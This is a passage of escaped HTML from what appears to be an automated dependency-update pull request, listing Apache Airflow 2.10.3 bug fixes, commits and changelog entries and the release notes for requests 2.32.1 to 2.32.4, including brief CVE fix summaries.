href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMiscellaneous\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck python version that was used to install pre-commit venvs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43282\"\u003e#43282\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43310\"\u003e#43310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eResolve warning in Dataset Alias migration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43425\"\u003e#43425\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/blob/2.10.3/RELEASE_NOTES.rst\"\u003eapache-airflow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eAirflow 2.10.3 (2024-11-04)\u003c/h2\u003e\n\u003cp\u003eSignificant Changes\n^^^^^^^^^^^^^^^^^^^\u003c/p\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003cp\u003eBug Fixes\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eMiscellaneous\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c99887ec11ce3e1a43f2794fcf36d27555140f00\"\u003e\u003ccode\u003ec99887e\u003c/code\u003e\u003c/a\u003e Update RELEASE_NOTES.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/1c7fba76ec613517632931d5a268029ad24b33cb\"\u003e\u003ccode\u003e1c7fba7\u003c/code\u003e\u003c/a\u003e mark test_task_workflow_trigger_success as flaky (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42972\"\u003e#42972\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43580\"\u003e#43580\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/08bbf89225b9b87521044fa04a9666690792a4cb\"\u003e\u003ccode\u003e08bbf89\u003c/code\u003e\u003c/a\u003e FIX: Don't raise a warning in ExecutorSafeguard when execute is called from a...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7e86bf85d3bd6fda387f0a5b189f382c0673f611\"\u003e\u003ccode\u003e7e86bf8\u003c/code\u003e\u003c/a\u003e Mark all tasks as skipped when failing a dag_run manually including t… (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/8e79c7a27f1fdb465afdd1d4de0de7d607a27357\"\u003e\u003ccode\u003e8e79c7a\u003c/code\u003e\u003c/a\u003e Fix TrySelector for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c12e6284c1a769da58903f076b93a32b185b12f1\"\u003e\u003ccode\u003ec12e628\u003c/code\u003e\u003c/a\u003e Conditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/898f332773772fea5ae76182c5393f14d212ddf8\"\u003e\u003ccode\u003e898f332\u003c/code\u003e\u003c/a\u003e Fix broken stat scheduler_loop_duration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7aea4b56d76e80ee65613b851b5a9898df56d79a\"\u003e\u003ccode\u003e7aea4b5\u003c/code\u003e\u003c/a\u003e Ensure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/9c044ea2a25240f7cc28b6e20337c2c4dc6e1e78\"\u003e\u003ccode\u003e9c044ea\u003c/code\u003e\u003c/a\u003e include limit and offset in request body schema for List task instances (batc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/dd296c5338150cebe24c1edb46ba5a944f82a5eb\"\u003e\u003ccode\u003edd296c5\u003c/code\u003e\u003c/a\u003e This PR resolves an SQLAlchemy warning in the migration by correctly setting ...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apache/airflow/compare/2.6.3...2.10.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.31.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca 